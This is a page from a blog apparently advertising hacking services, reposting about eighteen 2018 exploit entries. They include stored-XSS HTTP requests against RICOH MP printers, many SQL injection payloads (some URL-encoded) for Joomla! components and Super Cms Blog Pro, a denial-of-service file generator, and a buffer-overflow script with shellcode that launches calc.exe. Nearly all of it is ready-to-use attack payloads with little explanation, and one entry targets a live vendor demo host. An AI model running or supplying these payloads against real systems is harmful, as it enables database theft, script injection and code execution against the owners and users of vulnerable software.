Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863581390

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: RICOH MP C2003 Printer - Cross-Site Scripting
# Date: 2018-09-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link : https://www.ricoh.ca/en/products/pd/mp-c2003-color-laser-multifunction-printer/_/R-240-417253
# Software : RICOH Printer
# Product Version:  MP C2003
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : N/A

# On the MP C2003 printer, HTML Injection and Stored XSS vulnerabilities have been discovered in 
# the area of adding addresses via the entryNameIn parameter 
# to /web/entry/en/address/adrsSetUserWizard.cgi.

# HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: 134.96.209.202
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://134.96.209.202/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Cookie: risessionid=028553667951828; cookieOnOffChecker=on; wimsesid=552487526
Connection: close

mode=ADDUSER&step=BASE&wimToken=1581082599&entryIndexIn=00005&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
HireHackking 
# Exploit Title: RICOH MP C6003 Printer - Cross-Site Scripting
# Date: 2018-09-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c6003-color-laser-multifunction-printer/_/R-416534
# Software: RICOH Printer
# Product Version:  MP C6003
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection and Stored XSS
# CVE: N/A

# On the RICOH MP C6003 printer, HTML Injection and Stored XSS vulnerabilities have been 
# discovered in the area of adding addresses via the entryNameIn parameter 
# to /web/entry/en/address/adrsSetUserWizard.cgi.

# HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://TARGET/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 191
Cookie: risessionid=136092287407915; cookieOnOffChecker=on; wimsesid=201698077
Connection: close

mode=ADDUSER&step=BASE&wimToken=71325138&entryIndexIn=00031&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
HireHackking 
# Exploit Title: Beyond Remote 2.2.5.3 - Denial of Service (PoC)
# Author: Erenay Gencay
# Discovey Date: 2018-09-24
# Vendor notified : 2018-09-24
# Software Link: https://beyond-remote-client-and-server.jaleco.com/
# Tested Version: 2.2.5.3
# Tested on OS: Windows XP Professional sp3 (ENG)

# Steps to Reproduce: Run the python exploit script, it will create a new file
# file with the name "mre.txt". Copy the content of the new file "mre.txt".
# Start Beyond Remote Server 2.2.5.3 and click "Configure" than click "Update Options" than 
# click "Proxy Settings" Paste the content into field "Proxy Password" click "OK"
# It will cause the DOS situation.

bof = "A" * 2000

try:

	print("payload is loading..")
	
	dosya = open('mre.txt','w')
	dosya.write(bof)
	dosya.close()
	print(" [+] File Created")

except:
	print("Someting went wrong !")
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Raffle Factory 3.5.2 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/raffle-factory/
# Version: 3.5.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17379
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?task=showSearchResults&option=com_rafflefactory&filter_order_Dir=[SQL]&filter_order=[SQL]
# 
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#  
# # # #
HireHackking 
# Exploit Title: Joomla! Component Dutch Auction Factory 2.0.2 - 'filter_order_Dir' SQL Injection
# Dork: N/A
# Exploit Author: Ihsan Sencan
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/dutch-auction-factory/
# Version: 2.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1) http://localhost/[PATH]/index.php?option=com_dutchfactory&task=showSearchResults&filter_order_Dir=[SQL]&filter_order=[SQL]
 
%2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
HireHackking 
# # # # #
# Exploit Title: Super Cms Blog Pro 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://coolscript.cf/
# Software Link: https://www.codegrape.com/item/super-cms-blog-pro/22250
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17391
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/authors_post.php?author=[SQL]&p_id=1
# 
# '++/*!11111UNION*/+/*!11111SELECT*/+0x31,0x32,/*!11111CONCAT_WS*/(0x203a20,VERSION()),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131--+-
#  
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Penny Auction Factory 2.0.4 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/penny-auction-factory/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17378
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_pennyfactory&task=showSearchResults&filter_order_Dir[SQL]&filter_order=[SQL]
# 
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#  
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Music Collection 3.0.3 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://joomlathat.com/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/music-collection/
# Version: 3.0.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17375
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php/music-collection/playlist-0-on-the-go?task=edit_playlist&id=[SQL]
# 
# 0%20%4f%52%20%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
#  
# # # #
HireHackking 
# Exploit Title: Easy PhoroResQ 1.0 - Buffer Overflow (PoC)
# Discovery by: Cemal Cihad ÇİFTÇİ
# Discovery Date: 2018-09-24
# Tested Version: 1.0
# Vulnerability Type: Local Buffer Overflow
# Tested on OS: Windows XP Professional Service Pack 3
# Vendor Homepage: http://www.easyphotoresq.com/
# Download Link: http://www.easyphotoresq.com/download.html
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "boom.txt". Copy the content of the new file "boom.txt". 
# Now start the program. Now when you are inside of the programwindow #click "File" > "Options". 
# In the field: "Folder/filename" paste the copied #content from "boom.txt". 
# Now click "OK" and calc.exe will appear.

#!/usr/bin/python

buffer = "A" * 1320 + "\xdf\x44\xc6\x4e" + "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"

payload = buffer
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Questions 1.4.3 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://extensiondeveloper.com/
# Software Link: https://extensions.joomla.org/extensions/extension/communication/question-a-answers/questions/
# Version: 1.4.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17377
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_questions&tmpl=component&task=quazax.getusers&term=[SQL]
# 
# 66' UNION ALL SELECT NULL,NULL,CONCAT((SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x))--+-
# 
# 66' UNION ALL SELECT NULL,NULL,CONCAT(replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x243c62723e253c62723e,0x24,0x3c62723e3c62723e20494853414e2053454e43414e203c666f6e7420636f6c6f723d7265643e),0x25,version()),0x26,database()),0x27,user())),0x24,(select+count(*)+from+information_schema.columns+where+table_schema=database()+and@:=replace(replace(0x003c62723e2a,0x00,@),0x2a,table_name))),0x25,@))--+-
# 
# 66' AND (SELECT 8948 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(8948=8948,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Efe
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_questions&tmpl=component&task=quazax.sendnotification&userid=[SQL]&users=[SQL]&groups=[SQL]
# 
# 
# 66 OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),(SELECT (ELT(1=1,1))),0x7e7e496873616e53656e63616e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_questions&tmpl=component&task=quazax.addnewgroup&group_name=[SQL]
# 
# %27%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d
# 
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Social Factory 3.8.3 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/social-factory/
# Version: 3.8.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17385
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/socialfactory-events/socialfactory-events-radius-search?option=com_socialfactory&view=page&task=page.display&radius[lat]=[SQL]&radius[lng]=[SQL]&radius[radius]=[SQL]
# 
# %20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
#  
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Jobs Factory 2.0.4 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/jobs-factory/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17382
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jobsfactory&task=categories&filter_letter=[SQL]
# 
# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
#  
# %27%20%4f%52%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69
#  
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Swap Factory 2.2.1 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/swap-factory/
# Version: 2.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17384
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?task=showSearchResults&Itemid=115&option=com_swapfactory&filter_order_Dir=[SQL]&filter_order=[SQL]
# 
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#  
# # # #
HireHackking 
# Exploit Title: Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection
# Dork: N/A
# Date: 2018-08-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://extro.media/
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/extroforms/
# Version: 2.1.5
# Category: Webapps
# Tested on: Kali linux
# Description : An attacker can execute SQL commands through parameters that contain vulnerable.
# An authorized user can use the filtering feature and can fully authorize the database or other server informations.

# "filter_type_id, filter_pid_id, filter_search" parameters have the same vulnerable.
# Demo: https://demo.extro.media/responsive-joomla-extensions-en/extroforms-demos-en/
# PoC : SQLi :

POST /administrator/index.php?option=com_extroform&view=extroformfield
Host: demo.extro.media
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.extro.media/administrator/index.php?option=com_extroform&view=extroformfield
Cookie: 2e7fc5dc4e4ce76c3319e1db921484ac=eqgcirsi6m53s6vbi7bbgng1n5; 48bd4f2f65b6c84d32f8704444f9b24c=rt2t3ur8fgmbjemdqua1vn8u35
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
filter_type_id=1&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1

# Parameter: filter_type_id (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: filter_type_id=-7022 OR 5787=5787#&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: filter_type_id=1 AND (SELECT 5756 FROM(SELECT COUNT(*),CONCAT(0x7162706271,(SELECT (ELT(5756=5756,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind

Payload: filter_type_id=1 AND SLEEP(5)&filter_pid_id=6&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&cc73497ba686a8903b677f55cb29b616=1

# Parameter: filter_pid_id (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: filter_type_id=1&filter_pid_id=-5547 OR 1857=1857#&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: filter_type_id=1&filter_pid_id=7 AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(2680=2680,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind

Payload: filter_type_id=1&filter_pid_id=7 OR SLEEP(5)&filter_search=&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1

# Parameter: filter_search (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND 8748=8748#&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND (SELECT 2429 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(2429=2429,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zyPZ&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind

Payload: filter_type_id=1&filter_pid_id=7&filter_search=" AND SLEEP(5)-- fDVO&limitstart=0&task=&boxchecked=0&filter_order=&filter_order_Dir=&e0b80bd9e6ffbad6d1ab256ec3149955=1
HireHackking 
# Exploit Title: RICOH MP C6503 Plus Printer - Cross-Site Scripting
# Date: 2018-09-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c6503-plus-color-laser-multifunction-printer/_/R-SIG-C6503-PLU-SET
# Software: RICOH Printer
# Product Version:  MP C6503 Plus
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection and Stored XSS
# CVE: N/A

# On the RICOH MP C6503 Plus printer, HTML Injection and Stored XSS vulnerabilities have been discovered 
# in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.

# HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://Target/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 192
Cookie: risessionid=186737374338492; cookieOnOffChecker=on; wimsesid=205216910
Connection: close

mode=ADDUSER&step=BASE&wimToken=278155990&entryIndexIn=00018&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/reverse-auction-factory/
# Version: 4.3.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17376
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]
# 
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#  
# 2)
# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]
# 
# %31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d
#  
# 3)
# http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]
# 
# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
#  
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Collection Factory 4.1.9 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/collection-factory/
# Version: 4.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17383
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/collection-categories?option=com_collectionfactory&task=items&filter_order=[SQL]&filter_order_Dir=[SQL]
# 
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#  
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://multiplanet.gr/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/alphaindex-dictionaries/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17397
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_aindexdictionaries&task=getArticlesPreview
# 
# Parameter: letter=[SQL] (POST)
#  
# Payload: " AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
# 
#  POST /alphaindex-dictionaries/index.php?option=com_aindexdictionaries&task=getArticlesPreview HTTP/1.1
#  Host: localhost
#  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
#  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#  Accept-Language: en-US,en;q=0.5
#  Accept-Encoding: gzip, deflate
#  Cookie: 4d2a26b1a22184c44838ed58a1427b57=a5ebafd40988be7421846f2e1a496b61
#  Connection: keep-alive
#  Upgrade-Insecure-Requests: 1
#  Content-Type: application/x-www-form-urlencoded
#  Content-Length: 200
#  
